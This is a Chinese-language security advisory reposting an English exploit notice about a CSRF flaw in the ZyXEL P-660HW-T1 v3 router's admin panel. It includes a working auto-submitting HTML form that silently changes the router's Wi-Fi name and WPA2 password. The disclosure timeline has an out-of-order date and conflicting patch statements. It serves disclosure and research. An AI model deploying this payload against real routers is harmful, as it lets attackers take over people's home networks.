Zyxel P-660HW-T1 v3无线路由器CSRF漏洞


发布日期:2014-05-29
更新日期:2014-05-31

受影响系统:
ZyXEL P-660HW-T1 v3
描述:
--------------------------------------------------------------------------------
Zyxel P-660HW-T1是无线路由器产品。

 P-660HW-T1无线路由器版本3的管理面板存在安全漏洞,攻击者可利用此漏洞在受影响设备上执行任意代码。
 
<*来源:Mustafa ALTINKAYNAK
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Mustafa ALTINKAYNAK ()提供了如下测试方法:
 
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
 # Date: 05/22/2014
 # Author: Mustafa ALTINKAYNAK
 # Vendor Homepage:http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml?t=p
 # Category: Hardware/Wireless Router
 # Tested on: Zyxel P-660HW-T1 v3 Wireless Router
 # Patch/ Fix: Vendor has not provided any fix for this yet
 ---------------------------
 
 Technical Details
 ---------------------------
 This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
 You can send the form below to prepare the target. Please offending. Being partners in crime.

 Disclosure Timeline
 ---------------------------
 05/21/2014  Contacted Vendor
05/22/2014  Vendor Replied
 04/22/2014  Vulnerability Explained (No reply received)
 05/23/2014  Full Disclosure

 Exploit Code
---------------------------
 
 Change Wifi (WPA2/PSK) password & SSID by CSRF
 ---------------------------------------------------------------------------------
 <html>
 <body onload="document.form.submit();">
 <form action="http://192.168.1.1/Forms/WLAN_General_1"
 method="POST" name="form">
 <input type="hidden" name="EnableWLAN" value="on">
 <input type="hidden" name="Channel_ID" value="00000005">
 <input type="hidden" name="ESSID" value="WIFI NAME">
 <input type="hidden" name="Security_Sel" value="00000002">
 <input type="hidden" name="SecurityFlag" value="0">
 <input type="hidden" name="WLANCfgPSK" value="123456">
 <input type="hidden" name="WLANCfgWPATimer" value="1800">
 <input type="hidden" name="QoS_Sel" value="00000000">
 <input type="hidden" name="sysSubmit" value="Uygula">
 </form>
 </body>
 </html>

-----------

 Mustafa ALTINKAYNAK
 twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
 www.mustafaaltinkaynak.com

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
ZyXEL
 -----
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml?t=p

本文永久更新链接地址:

相关内容

    暂无相关文章